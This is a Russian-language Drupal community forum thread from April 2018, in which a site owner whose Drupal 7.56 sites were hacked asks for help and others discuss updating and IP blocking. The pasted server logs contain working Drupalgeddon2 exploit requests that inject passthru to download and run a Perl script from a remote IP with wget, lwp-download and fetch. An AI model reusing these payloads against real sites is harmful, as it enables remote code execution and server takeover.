Тотальный взлом всех сайтов Друпал

Главные вкладки

Аватар пользователя Danunafik Danunafik 25 апреля 2018 в 18:04

Здрасьте. Вот у меня сайтов 15 сделано на Drupal 7.56. Из них в апреле 10 взломано. Не тронуты 7.58 и 7.54. Это я такой неудачник, или это по статистике больше половины сайтов на Drupal 7.56 ломается ?
Вчера один сайт обновил, вижу что вирусов нет. Сайт не изменялся, поэтому я и базу восстановил на пару месяцев назад. Но происходят такие запросы:

[u][24/Apr/2018:22:28:57 +0300] 0.250 0.250 200 185.234.217.11 auto-discount69.ru POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=cd+/var/tmp/+;+cd+/tmp/+;+rm+-rf+maxx2.txt+;+wget+http://195. 22.126.16/maxx2.txt+;+mv+maxx2.txt+wget.txt+;+perl+wget.txt+195.22.127.225+;+lwp-download+ht tp ://195.22.126.16/maxx2.txt+;+mv+maxx2.txt+lynx.txt+;+perl+lynx.txt+195.22.127.225+;+fetch+http://195.22.126.16/maxx2.txt+;+mv+maxx2.txt+fetch.txt+;+perl+fetch.txt... HTTP/1.1 "curl/7.35.0" "-" 14941 141.8.194.189 a123456

И сайт падает в офлайн:

"В настоящий момент сайт потребляет ресурсов больше,
чем доступно по тарифному плану.
Пожалуйста, зайдите позднее."

В техподдержке ничего не сказали кроме того что сайт у меня без вирусов (они проверили), а то что он отключается, связано с запросами, которые выше. А я то дуб дубом в этих запросах. Может кто знает, что можно делать, или я так понимаю ботам надоест эти запросы слать со временем.

Комментарии

Аватар пользователя ivnish ivnish 25 апреля 2018 в 18:12
1

или это по статистике больше половины сайтов на Drupal 7.56 ломается

Ломаются все сайты своевременно не обновленные до 7.58

Аватар пользователя Semantics Semantics 25 апреля 2018 в 18:51

Это попытки взлома.
Вам бы их прикрыть хотя бы в .htaccess, если вас ими долбут, то позволит отбить на уровне веб-сервера.
Но не вижу причин, чтобы сайт ложился от такого запроса

Аватар пользователя Danunafik Danunafik 25 апреля 2018 в 18:59

Методом тыка добавил в .htacess блокировку по диапазону ip

Order Deny,Allow
Deny from 195.0.0.0/8

Стало всё нормально... пока айпи не сменится.

А сегодня опять патч на друпал выйдет вроде ? Опять все обновлять нужно будет ?

upd/ Не, опять отключился сайт.

Аватар пользователя Alex_on Alex_on 25 апреля 2018 в 21:41

10 лет на 6, 7 и 8 - никаких проблем. Но тут прилетела эта фигня от 28 марта - почти все 7 и 8 в середине апреля были взломаны )

Аватар пользователя Danunafik Danunafik 25 апреля 2018 в 22:02

Ну хоть обрадовали, не у меня одного. А то я уже пароли от сайтов начал хранить в архиве под паролями ) Думал что с компьютера сперли что нибудь.

Аватар пользователя Danunafik Danunafik 27 апреля 2018 в 0:10

Господа, подскажите
Я уж сайт обновил весь до 7.59, модули все новые записал в тему, библиотеки новые закачал, короче всю папку sites проверил и перезалил с исходника. Модулем hacked проверил. По дате изменения проверил. Базу просканировал на всякие вредности, тем более база взята с копии двухмесячной давности.
Прописывал доступ в htacess только своему IP, проверял что с другого айпи не заходит.
Но сайт всё равно отключается из за перегрузки. Я мало понимаю, но как, если все IP заблокированы.

В итоге вот:

Аккаунт был заблокирован во время попытки попытки взлома ваших сайта на CMS Drupal через критическую уязвимость:

[u][24/Apr/2018:15:10:25 +0300] 0.350 0.350 200 185.212.128.77 auto-discount69.ru POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=pwd&name[%23type]=markup HTTP/1.1 "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36" "http://auto-discount69.ru/wp-admin/admin-ajax.php" 4923 141.8.194.189 a0112345

Техподдержка говорит - обновите сайт. Я им говорю, что уже обновил. Они мне опять обновите, я говорю что обновил. Опять проверят своим антивирусом, напишут что ничего нет. А если выждать паузу в 12 часов и спросить их опять про сайт, они опять говорят чтобы я обновил сайт.

Аватар пользователя Semantics Semantics 27 апреля 2018 в 0:23

Видимо, техподдержка не очень умная и не понимает, что далеко не все хакеры знают, что вы обновили сайт.
Поэтому безуспешные попытки взломов будут продолжаться.

Уточните у них, в чём именно претензия к вам

Аватар пользователя Danunafik Danunafik 27 апреля 2018 в 0:32

Да они со мной здороваются в каждом сообщении, что то не так.

Я спросил "Нагрузка такая, это от сайта нагрузка, или от того что кто то запросы шлет ?"

Ответили вот:

Здравствуйте. <<<----опять здороваются

Повышенной нагрузке предшествовал запрос:

[u][24/Apr/2018:22:37:00 +0300] - 482.250 499 185.234.217.11 auto-discount69.ru POST //?q=file/ajax/name/%23value/form-ww-QqJvaCo1gsPfPgEmtwULBYx98mrOThEvPdPa1I88 HTTP/1.1 "curl/7.35.0" "-" 0 141.8.194.189 a0123456

Нам неизвестно, какие именно данные были переданы в POST-запросе, и, соответственно, определить источник нагрузки уже невозможно.

Доступ к сайтам по основным доменам разблокирован.

Аватар пользователя Phantom63rus Phantom63rus 27 апреля 2018 в 18:06

Да как бы не должно оно ложиться от попыток взлома. Да и не ложится, иначе бы пол-рунета уже встало раком.

ИМХО проблема не в сайтах, а в хостинге.

Аватар пользователя fairrandir fairrandir 27 апреля 2018 в 18:25

1. Drupal хреново переносит POST-запросы, вполне может DoS быть.
2. Пол-рунета уже стоит раком. У меня по-моему только друру без косяков открывается.

Аватар пользователя Phantom63rus Phantom63rus 27 апреля 2018 в 19:01

У меня стабильно один только телеграм работает:))))

Мне кажется что сайт по автозапчастям это какая-то странная цель для ддоса. Да и вообще я не вижу что там может тормозить, там 3 (три!) страницы. Никакого каталога, никаких выборок, ничего.

Я бы то вообще переделал в одностраничный лэндинг без всякого пхп.